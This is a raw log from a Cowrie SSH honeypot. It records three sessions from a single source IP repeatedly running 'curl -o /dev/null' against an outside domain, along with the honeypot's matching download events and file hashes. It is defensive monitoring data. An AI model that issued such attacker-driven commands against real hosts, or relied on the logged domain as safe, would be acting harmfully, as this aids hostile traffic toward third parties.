{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.981895Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.986040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.987285Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.988206Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.990505Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.991037Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.026649Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.027663Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.056601Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.058555Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.061186Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.063650Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.066169Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.066654Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.073180Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.073735Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.076501Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.077186Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.111552Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.112315Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.115882Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.118859Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.119944Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.120608Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.122249Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.122829Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.128616Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.154454Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.156425Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.157605Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.158424Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.164228Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.166168Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.167017Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.170186Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.170913Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.201008Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.202185Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.202758Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.207235Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.208605Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.209207Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.212657Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.214155Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.214650Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.240762Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.241804Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.242211Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.245567Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.248274Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.248873Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.252467Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.256817Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.257941Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.283380Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.285322Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.286798Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.287565Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.291059Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.291625Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.297938Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.301921Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.302791Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.330175Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.332306Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.335442Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.335917Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.337896Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.338263Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.346555Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.347731Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.348436Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.376670Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.379064Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.382845Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.386033Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.386684Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.392208Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.392844Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.396181Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
